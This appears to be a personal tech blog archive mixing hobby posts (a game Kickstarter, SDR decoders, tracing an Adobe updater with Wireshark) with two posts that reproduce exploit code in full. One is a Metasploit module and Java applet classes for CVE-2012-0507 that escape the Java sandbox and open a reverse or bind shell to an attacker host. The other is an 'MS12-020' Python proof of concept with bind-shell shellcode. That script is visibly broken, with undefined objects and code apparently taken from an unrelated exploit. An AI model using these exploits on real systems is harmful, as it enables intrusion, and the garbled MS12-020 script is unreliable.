Wednesday, February 17, 2016

Battalion 1944

Have not been this excited to get a game in a long time, Modern take on original COD/MOH style game, sign me up.








You can back the game here:

https://www.kickstarter.com/projects/bulkheadinteractive/battalion-1944-pc-xb1-ps4

Friday, February 7, 2014

Living without a computer....

Well my computer decided to die on me so I am now having an inpromptu exercise of living without one.  Yes not fully since today's phones pretty much are computers.  Weirdly the only thing I really miss is the  keyboard.  On the bright side I'm a lot more productive in the house and with baby.

Sunday, August 19, 2012

Satellite & Radio Data Decoding Software

After getting my rtl-sdr usb stick I have spend a lot of time scouring the internet for different decoder software. And after finding out there aren't any coherent & up to date lists of said software I believe making a post about them could also be beneficial to other people. This is still a work in progress so if you know of other software not on the list please leave a comment and I will add it.


Saturday, April 14, 2012

JAVA CVE-2012-0507 Metasploit POC

Authors:
Jeroen Frijters @ sinn3r at metasploit dot com
Juan Vazquez @ egypt at metasploit dot com



 ##  
 # This file is part of the Metasploit Framework and may be subject to  
 # redistribution and commercial restrictions. Please see the Metasploit  
 # Framework web site for more information on licensing and terms of use.  
 #  http://metasploit.com/framework/  
 ##  
 require 'msf/core'  
 require 'rex'  
 class Metasploit3 < Msf::Exploit::Remote  
      Rank = ExcellentRanking  
      include Msf::Exploit::Remote::HttpServer::HTML  
      include Msf::Exploit::EXE  
      include Msf::Exploit::Remote::BrowserAutopwn  
      autopwn_info({ :javascript => false })  
      def initialize( info = {} )  
           super( update_info( info,  
                'Name'      => 'Java AtomicReferenceArray Type Violation Vulnerability',  
                'Description'  => %q{  
                          This module exploits a vulnerability due to the fact that  
                     AtomicReferenceArray uses the Unsafe class to store a reference in an  
                     array directly, which may violate type safety if not used properly.  
                     This allows a way to escape the JRE sandbox, and load additional classes  
                     in order to perform malicious operations.  
                },  
                'License'    => MSF_LICENSE,  
                'Author'     =>  
                     [  
                          'Jeroen Frijters', #Initial discovery according to his blog  
                          'sinn3r',     # metasploit module  
                          'juan vazquez',  # metasploit module  
                          'egypt'      # added support for older java versions  
                     ],  
                'References'   =>  
                     [  
                          ['CVE', '2012-0507'],  
                          ['OSVDB', '80724'],  
                          ['BID', '52161'],  
                          ['URL', 'http://weblog.ikvm.net/PermaLink.aspx?guid=cd48169a-9405-4f63-9087-798c4a1866d3'],  
                          ['URL', 'http://blogs.technet.com/b/mmpc/archive/2012/03/20/an-interesting-case-of-jre-sandbox-breach-cve-2012-0507.aspx'],  
                          ['URL', 'http://schierlm.users.sourceforge.net/TypeConfusion.html'],  
                          ['URL', 'https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2012-0507']  
                     ],  
                'Platform'    => [ 'java', 'win', 'osx', 'linux', 'solaris' ],  
                'Payload'    => { 'Space' => 20480, 'BadChars' => '', 'DisableNops' => true },  
                'Targets'    =>  
                     [  
                          [ 'Generic (Java Payload)',  
                               {  
                                    'Platform' => ['java'],  
                                    'Arch' => ARCH_JAVA,  
                               }  
                          ],  
                          [ 'Windows x86 (Native Payload)',  
                               {  
                                    'Platform' => 'win',  
                                    'Arch' => ARCH_X86,  
                               }  
                          ],  
                          [ 'Mac OS X PPC (Native Payload)',  
                               {  
                                    'Platform' => 'osx',  
                                    'Arch' => ARCH_PPC,  
                               }  
                          ],  
                          [ 'Mac OS X x86 (Native Payload)',  
                               {  
                                    'Platform' => 'osx',  
                                    'Arch' => ARCH_X86,  
                               }  
                          ],  
                          [ 'Linux x86 (Native Payload)',  
                               {  
                                    'Platform' => 'linux',  
                                    'Arch' => ARCH_X86,  
                               }  
                          ],  
                     ],  
                'DefaultTarget' => 0,  
                'DisclosureDate' => 'Feb 14 2012'  
                ))  
      end  
      def exploit  
           # load the static jar file  
           path = File.join( Msf::Config.install_root, "data", "exploits", "CVE-2012-0507.jar" )  
           fd = File.open( path, "rb" )  
           @jar_data = fd.read(fd.stat.size)  
           fd.close  
           super  
      end  
      def on_request_uri( cli, request )  
           data = ""  
           host = ""  
           port = ""  
           peer = "#{cli.peerhost}:#{cli.peerport}"  
           if not request.uri.match(/\.jar$/i)  
                if not request.uri.match(/\/$/)  
                     send_redirect( cli, get_resource() + '/', '')  
                     return  
                end  
                print_status("#{peer} - Sending #{self.name}")  
                payload = regenerate_payload( cli )  
                if not payload  
                     print_error("#{peer} - Failed to generate the payload." )  
                     return  
                end  
                if target.name == 'Generic (Java Payload)'  
                     if datastore['LHOST']  
                          jar = payload.encoded  
                          host = datastore['LHOST']  
                          port = datastore['LPORT']  
                          vprint_status("Java reverse shell to #{host}:#{port} from #{peer}" )  
                     else  
                          port = datastore['LPORT']  
                          datastore['RHOST'] = cli.peerhost  
                          vprint_status( "Java bind shell on #{cli.peerhost}:#{port}..." )  
                     end  
                     if jar  
                          print_status( "Generated jar to drop (#{jar.length} bytes)." )  
                          jar = Rex::Text.to_hex( jar, prefix="" )  
                     else  
                          print_error("#{peer} - Failed to generate the executable." )  
                          return  
                     end  
                else  
                     # NOTE: The EXE mixin automagically handles detection of arch/platform  
                     data = generate_payload_exe  
                     if data  
                          print_status("#{peer} - Generated executable to drop (#{data.length} bytes)." )  
                          data = Rex::Text.to_hex( data, prefix="" )  
                     else  
                          print_error("#{peer} - Failed to generate the executable." )  
                          return  
                     end  
                end  
                send_response_html( cli, generate_html( data, jar, host, port ), { 'Content-Type' => 'text/html' } )  
                return  
           end  
           print_status( "#{peer} - sending jar..." )  
           send_response( cli, generate_jar(), { 'Content-Type' => "application/octet-stream" } )  
           handler( cli )  
      end  
      def generate_html( data, jar, host, port )  
           jar_name = rand_text_alpha(rand(6)+3) + ".jar"  
           html = "<html><head></head>"  
           html += "<body>"  
           html += "<applet archive=\"#{jar_name}\" code=\"msf.x.Exploit.class\" width=\"1\" height=\"1\">"  
           html += "<param name=\"data\" value=\"#{data}\"/>" if data  
           html += "<param name=\"jar\" value=\"#{jar}\"/>" if jar  
           html += "<param name=\"lhost\" value=\"#{host}\"/>" if host  
           html += "<param name=\"lport\" value=\"#{port}\"/>" if port  
           html += "</applet></body></html>"  
           return html  
      end  
      def generate_jar()  
           return @jar_data  
      end  
 end  
Exploit
 package a;  
 import java.applet.Applet;  
 import java.io.ByteArrayInputStream;  
 import java.io.ObjectInputStream;  
 import java.util.concurrent.atomic.AtomicReferenceArray;  
 import a.*;  
 // Referenced classes of package a:  
 //                Help  
 public class Exploit extends Applet  
 {  
      public Exploit()  
      {  
      }  
      public static byte[] StringToBytes(String s)  
      {  
           byte abyte0[] = new byte[s.length() / 2];  
           for(int i = 0; i < s.length(); i += 2)  
                abyte0[i / 2] = (byte)((Character.digit(s.charAt(i), 16) << 4) + Character.digit(s.charAt(i + 1), 16));  
           return abyte0;  
      }  
      public void init()  
      {  
           try  
           {  
                String as[] = {  
                     "ACED0005757200135B4C6A6176612E6C616E672E4F62", "6A6563743B90CE589F1073296C020000787000000002", "757200095B4C612E48656C703BFE2C941188B6E5FF02", "000078700000000170737200306A6176612E7574696C", "2E636F6E63757272656E742E61746F6D69632E41746F", "6D69635265666572656E63654172726179A9D2DEA1BE", "65600C0200015B000561727261797400135B4C6A6176", "612F6C616E672F4F626A6563743B787071007E0003"   
                };  
                StringBuilder stringbuilder = new StringBuilder();  
                for(int i = 0; i < as.length; i++)  
                     stringbuilder.append(as[i]);  
                ObjectInputStream objectinputstream = new ObjectInputStream(new ByteArrayInputStream(StringToBytes(stringbuilder.toString())));  
                Object aobj[] = (Object[])(Object[])objectinputstream.readObject();  
                Help ahelp[] = (Help[])(Help[])aobj[0];  
                AtomicReferenceArray atomicreferencearray = (AtomicReferenceArray)aobj[1];  
                ClassLoader classloader = getClass().getClassLoader();  
                atomicreferencearray.set(0, classloader);  
                Help _tmp = ahelp[0];  
                String data = getParameter( "data" );  
                String jar  = getParameter( "jar" );  
                String lhost = getParameter( "lhost" );  
                String lport = getParameter( "lport" );       
                System.out.println("go go go");  
                Help.doWork(ahelp[0], this, data, jar, lhost, ( lport == null ? 4444 : Integer.parseInt( lport ) ));  
           }  
           catch(Exception exception) {   
                System.out.println(exception.getMessage());  
           }  
      }  
 }  
Helper
 package a;  
 import java.io.ByteArrayOutputStream;  
 import java.io.IOException;  
 import java.io.InputStream;  
 import java.io.ObjectInputStream;  
 import java.io.ObjectOutputStream;  
 import java.io.Serializable;  
 import java.net.URL;  
 import java.security.AllPermission;  
 import java.security.CodeSource;  
 import java.security.Permissions;  
 import java.security.ProtectionDomain;  
 import java.security.cert.Certificate;  
 import java.lang.reflect.Field;  
 public class Help extends ClassLoader implements Serializable{  
      public static void doWork(Help h, Exploit expl, String data, String jar, String lhost, int lport) {  
           String classNames[] = { "msf.x.PayloadX$StreamConnector", "msf.x.PayloadX" };  
           String classPaths[] = { "/msf/x/PayloadX$StreamConnector.class", "/msf/x/PayloadX.class" };  
           Class cls = null;  
           try  
           {  
                for( int index=0 ; index<classNames.length ; index++ )  
                {  
                     ByteArrayOutputStream bos = new ByteArrayOutputStream();  
                     byte[] buffer = new byte[8192];  
                     int length;  
                     // read in the class file from the jar  
                     InputStream is = expl.getClass().getResourceAsStream( classPaths[index] );  
                     // and write it out to the byte array stream  
                     while( ( length = is.read( buffer ) ) > 0 )  
                          bos.write( buffer, 0, length );  
                     // convert it to a simple byte array  
                     buffer = bos.toByteArray();  
                     URL url = new URL( "file:///" );  
                     Certificate[] certs = new Certificate[0];  
                     Permissions perm = new Permissions();  
                     perm.add( new AllPermission() );  
                     ProtectionDomain pd = new ProtectionDomain( new CodeSource( url, certs ), perm );  
                     cls = h.defineClass( classNames[index], buffer, 0, buffer.length, pd );  
                     Class class_cls = cls.getClass();   
                     System.out.println("The type of the object is: " + class_cls.getName());   
                }  
                // cls will end up being the PayloadX class  
                if( cls != null )  
                {  
                     // reflect into the PayloadX class to get these three fields  
                     Field payload_data = cls.getField( "data" );  
                     Field payload_jar  = cls.getField( "jar" );  
                     Field payload_lhost = cls.getField( "lhost" );  
                     Field payload_lport = cls.getField( "lport" );  
                     // instantiate the PayloadX object once so as we can set the native payload data  
                     Object obj = cls.newInstance();  
                     // set the native payload data, lhost and lport  
                     payload_data.set( obj, data );  
                     payload_jar.set( obj, jar );  
                     payload_lhost.set( obj, lhost );  
                     payload_lport.setInt( obj, lport );  
                     // instantiate a second PayloadX object to perform the actual payload   
                     obj = cls.newInstance();  
                }  
           }  
           catch( Exception e ) {  
                System.out.println(e.getMessage());  
           }            
      }  
 }  

CSI:NY Guide to xbox360 game hacking



Thursday, April 12, 2012

What the hell is downloading all that stuff under netsvcs?

I like to play online games, and just about nothing is as annoying as lag during those games. One thing that however does make it worse is lag caused by download that you can't identify. So I am playing a game on my free time, all of a sudden my ping times jump to 999ms. Naturally I look at my connections see that process with PID 428 is downloading something. Quick look in to task manager and found out that 428 is netsvcs. That then doesn't make things really much clearer as to what is the culprit of in downloading large amounts of data, in this case from 92.123.155.59. Which ripe shows as being owned by Akamai Technologies. This still doesn't make things any clearer as I don't remember, and can't find by quick search of anything on my computer by Akamai.

Step in wireshark, filter on ip and immediatly we see the following:
33378 739.213642 192.168.0.149 92.123.155.59 HTTP 335 GET /pub/adobe/reader/win/10.x/10.1.0/en_US/AdbeRdr1010_en_US.msi HTTP/1.1 

So yes pointless post most likely, I just wish companies that do use auto updaters would clearly show when they are downloading, and what. If apple had had a clearly labelled updater in task list I wouldn't have had to go thru all that just to find out that acrobat is downloading update. But in one respect it was good thing, now I do not have acrobat reader on my desktop computer anymore since it has been replaced by foxit reader.

Monday, March 19, 2012

MS12-020 Exploit POC

*WARNING* I have not tried this myself yet, so caution is advised. As always when dealing with shell code that is not written by you.

#!/usr/bin/env python
#
#   MS12-020 Exploi
#
#   Uses FreeRDP
#
 
import struct
import sys
from freerdp import rdpRdp
from freerdp import crypto
from freerdp.rdpRdp import  rdpNego
 
#bind shellcode TCP port 4444
shellcode  = '\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90'
shellcode += '\x29\xc9\x83\xe9\xb0\xe8\xff\xff\xff\xff\xc0\x5e\x81\x76\x0e\xe9'
shellcode += '\x4a\xb6\xa9\x83\xee\xfc\xe2\xf4\x15\x20\x5d\xe4\x01\xb3\x49\x56'
shellcode += '\x16\x2a\x3d\xc5\xcd\x6e\x3d\xec\xd5\xc1\xca\xac\x91\x4b\x59\x22'
shellcode += '\xa6\x52\x3d\xf6\xc9\x4b\x5d\xe0\x62\x7e\x3d\xa8\x07\x7b\x76\x30'
shellcode += '\x45\xce\x76\xdd\xee\x8b\x7c\xa4\xe8\x88\x5d\x5d\xd2\x1e\x92\x81'
shellcode += '\x9c\xaf\x3d\xf6\xcd\x4b\x5d\xcf\x62\x46\xfd\x22\xb6\x56\xb7\x42'
shellcode += '\xea\x66\x3d\x20\x85\x6e\xaa\xc8\x2a\x7b\x6d\xcd\x62\x09\x86\x22'
shellcode += '\xa9\x46\x3d\xd9\xf5\xe7\x3d\xe9\xe1\x14\xde\x27\xa7\x44\x5a\xf9'
shellcode += '\x16\x9c\xd0\xfa\x8f\x22\x85\x9b\x81\x3d\xc5\x9b\xb6\x1e\x49\x79'
shellcode += '\x81\x81\x5b\x55\xd2\x1a\x49\x7f\xb6\xc3\x53\xcf\x68\xa7\xbe\xab'
shellcode += '\xbc\x20\xb4\x56\x39\x22\x6f\xa0\x1c\xe7\xe1\x56\x3f\x19\xe5\xfa'
shellcode += '\xba\x19\xf5\xfa\xaa\x19\x49\x79\x8f\x22\xa7\xf5\x8f\x19\x3f\x48'
shellcode += '\x7c\x22\x12\xb3\x99\x8d\xe1\x56\x3f\x20\xa6\xf8\xbc\xb5\x66\xc1'
shellcode += '\x4d\xe7\x98\x40\xbe\xb5\x60\xfa\xbc\xb5\x66\xc1\x0c\x03\x30\xe0'
shellcode += '\xbe\xb5\x60\xf9\xbd\x1e\xe3\x56\x39\xd9\xde\x4e\x90\x8c\xcf\xfe'
shellcode += '\x16\x9c\xe3\x56\x39\x2c\xdc\xcd\x8f\x22\xd5\xc4\x60\xaf\xdc\xf9'
shellcode += '\xb0\x63\x7a\x20\x0e\x20\xf2\x20\x0b\x7b\x76\x5a\x43\xb4\xf4\x84'
shellcode += '\x17\x08\x9a\x3a\x64\x30\x8e\x02\x42\xe1\xde\xdb\x17\xf9\xa0\x56'
shellcode += '\x9c\x0e\x49\x7f\xb2\x1d\xe4\xf8\xb8\x1b\xdc\xa8\xb8\x1b\xe3\xf8'
shellcode += '\x16\x9a\xde\x04\x30\x4f\x78\xfa\x16\x9c\xdc\x56\x16\x7d\x49\x79'
shellcode += '\x62\x1d\x4a\x2a\x2d\x2e\x49\x7f\xbb\xb5\x66\xc1\x19\xc0\xb2\xf6'
shellcode += '\xba\xb5\x60\x56\x39\x4a\xb6\xa9'
 
#Payload
payload  = '\x41\x00\x5c\x00'
payload += '\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x49\x49\x49'
payload += '\x49\x49\x49\x49\x49\x49\x49\x49\x49\x37\x49\x49\x51\x5a\x6a\x68'
payload += '\x58\x30\x41\x31\x50\x42\x41\x6b\x42\x41\x78\x42\x32\x42\x41\x32'
payload += '\x41\x41\x30\x41\x41\x58\x38\x42\x42\x50\x75\x4b\x59\x49\x6c\x43'
payload += '\x5a\x7a\x4b\x32\x6d\x5a\x48\x5a\x59\x69\x6f\x4b\x4f\x39\x6f\x71'
payload += '\x70\x6e\x6b\x62\x4c\x44\x64\x71\x34\x4c\x4b\x62\x65\x75\x6c\x4c'
payload += '\x4b\x63\x4c\x76\x65\x70\x78\x35\x51\x48\x6f\x6c\x4b\x50\x4f\x74'
payload += '\x58\x6e\x6b\x33\x6f\x55\x70\x37\x71\x48\x6b\x57\x39\x6c\x4b\x66'
payload += '\x54\x6e\x6b\x46\x61\x7a\x4e\x47\x41\x6b\x70\x7a\x39\x4c\x6c\x4c'
payload += '\x44\x6f\x30\x62\x54\x44\x47\x38\x41\x4b\x7a\x54\x4d\x44\x41\x4b'
payload += '\x72\x78\x6b\x39\x64\x35\x6b\x53\x64\x75\x74\x46\x48\x72\x55\x79'
payload += '\x75\x6c\x4b\x53\x6f\x76\x44\x44\x41\x48\x6b\x35\x36\x4e\x6b\x54'
payload += '\x4c\x30\x4b\x6c\x4b\x51\x4f\x65\x4c\x65\x51\x38\x6b\x77\x73\x36'
payload += '\x4c\x4e\x6b\x6e\x69\x30\x6c\x66\x44\x45\x4c\x30\x61\x69\x53\x30'
payload += '\x31\x79\x4b\x43\x54\x6c\x4b\x63\x73\x44\x70\x4e\x6b\x77\x30\x66'
payload += '\x6c\x6c\x4b\x72\x50\x45\x4c\x4c\x6d\x4e\x6b\x73\x70\x64\x48\x73'
payload += '\x6e\x55\x38\x6e\x6e\x32\x6e\x34\x4e\x58\x6c\x62\x70\x39\x6f\x6b'
payload += '\x66\x70\x66\x61\x43\x52\x46\x71\x78\x30\x33\x55\x62\x63\x58\x63'
payload += '\x47\x34\x33\x65\x62\x41\x4f\x30\x54\x39\x6f\x4a\x70\x52\x48\x5a'
payload += '\x6b\x38\x6d\x6b\x4c\x75\x6b\x30\x50\x6b\x4f\x6e\x36\x53\x6f\x6f'
payload += '\x79\x4a\x45\x32\x46\x6f\x71\x6a\x4d\x34\x48\x77\x72\x73\x65\x73'
payload += '\x5a\x37\x72\x69\x6f\x58\x50\x52\x48\x4e\x39\x76\x69\x4a\x55\x4c'
payload += '\x6d\x32\x77\x69\x6f\x59\x46\x50\x53\x43\x63\x41\x43\x70\x53\x70'
payload += '\x53\x43\x73\x50\x53\x62\x63\x70\x53\x79\x6f\x6a\x70\x35\x36\x61'
payload += '\x78\x71\x32\x78\x38\x71\x76\x30\x53\x4b\x39\x69\x71\x4d\x45\x33'
payload += '\x58\x6c\x64\x47\x6a\x74\x30\x5a\x67\x43\x67\x79\x6f\x39\x46\x32'
payload += '\x4a\x56\x70\x66\x31\x76\x35\x59\x6f\x58\x50\x32\x48\x4d\x74\x4e'
payload += '\x4d\x66\x4e\x7a\x49\x50\x57\x6b\x4f\x6e\x36\x46\x33\x56\x35\x39'
payload += '\x6f\x78\x50\x33\x58\x6b\x55\x51\x59\x4e\x66\x50\x49\x51\x47\x39'
payload += '\x6f\x48\x56\x32\x70\x32\x74\x62\x74\x46\x35\x4b\x4f\x38\x50\x6e'
payload += '\x73\x55\x38\x4d\x37\x71\x69\x69\x56\x71\x69\x61\x47\x6b\x4f\x6e'
payload += '\x36\x36\x35\x79\x6f\x6a\x70\x55\x36\x31\x7a\x71\x74\x32\x46\x51'
payload += '\x78\x52\x43\x70\x6d\x4f\x79\x4d\x35\x72\x4a\x66\x30\x42\x79\x64'
payload += '\x69\x7a\x6c\x4b\x39\x48\x67\x62\x4a\x57\x34\x4f\x79\x6d\x32\x37'
payload += '\x41\x6b\x70\x7a\x53\x6e\x4a\x69\x6e\x32\x62\x46\x4d\x6b\x4e\x70'
payload += '\x42\x44\x6c\x4c\x53\x6e\x6d\x31\x6a\x64\x78\x4c\x6b\x4e\x4b\x4e'
payload += '\x4b\x43\x58\x70\x72\x69\x6e\x6d\x63\x37\x66\x79\x6f\x63\x45\x73'
payload += '\x74\x4b\x4f\x7a\x76\x63\x6b\x31\x47\x72\x72\x41\x41\x50\x51\x61'
payload += '\x41\x70\x6a\x63\x31\x41\x41\x46\x31\x71\x45\x51\x41\x4b\x4f\x78'
payload += '\x50\x52\x48\x4c\x6d\x79\x49\x54\x45\x38\x4e\x53\x63\x6b\x4f\x6e'
payload += '\x36\x30\x6a\x49\x6f\x6b\x4f\x70\x37\x4b\x4f\x4e\x30\x4e\x6b\x30'
payload += '\x57\x69\x6c\x6b\x33\x4b\x74\x62\x44\x79\x6f\x6b\x66\x66\x32\x6b'
payload += '\x4f\x4e\x30\x53\x58\x58\x70\x4e\x6a\x55\x54\x41\x4f\x52\x73\x4b'
payload += '\x4f\x69\x46\x4b\x4f\x6e\x30\x68';
 
class SRVSVC_Exploit(Thread):
    def __init__(self, target, port=3389):
        super(SRVSVC_Exploit, self).__init__()
        self.__port   = port
        self.target   = target
 
    def __DCEPacket(self):
        print '[-]Connecting'
        self.__trans = rdp.transport.cert('rdp_np:%s\\x00\\x89]' % self.target)
        self.__trans.connect()
        print '[-]connected' % self.target
 
        # Making teh packet
        self.__stub='\x01\x00\x00\x00'
        self.__stub+='\xd6\x00\x00\x00\x00\x00\x00\x00\xd6\x00\x00\x00'
        self.__stub+=shellcode
        self.__stub+='\x41\x41\x41\x41\x41\x41\x41\x41'
        self.__stub+='\x41\x41\x41\x41\x41\x41\x41\x41'
        self.__stub+='\x41\x41\x41\x41\x41\x41\x41\x41'
        self.__stub+='\x41\x41\x41\x41\x41\x41\x41\x41'
        self.__stub+='\x41\x41\x41\x41\x41\x41\x41\x41'
        self.__stub+='\x41\x41\x41\x41\x41\x41\x41\x41'
        self.__stub+='\x41\x41\x41\x41\x41\x41\x41\x41'
        self.__stub+='\x41\x41\x41\x41\x41\x41\x41\x41'
        self.__stub+='\x00\x00\x00\x00'
        self.__stub+='\x2f\x00\x00\x00\x00\x00\x00\x00\x2f\x00\x00\x00'
        self.__stub+=payload
        self.__stub+='\x00\x00\x00\x00'
        self.__stub+='\x02\x00\x00\x00\x02\x00\x00\x00'
        self.__stub+='\x00\x00\x00\x00\x02\x00\x00\x00'
        self.__stub+='\x5c\x00\x00\x00\x01\x00\x00\x00'
        self.__stub+='\x01\x00\x00\x00\x90\x90\xb0\x53\x6b\xC0\x28\x03\xd8\xff\xd3'
        return
 
    def run(self):
        self.__DCEPacket()
        self.__dce.call(0x1f, self.__stub)
        print '[-]Exploit successfull!...\nTelnet to port 4444 on target machine.'
 
if __name__ == '__main__':
       target = sys.argv[1]
       print '\nUsage: %s  \n' % sys.argv[0]
        sys.exit(-1)
 
current = SRVSVC_Exploit(target)
current.start()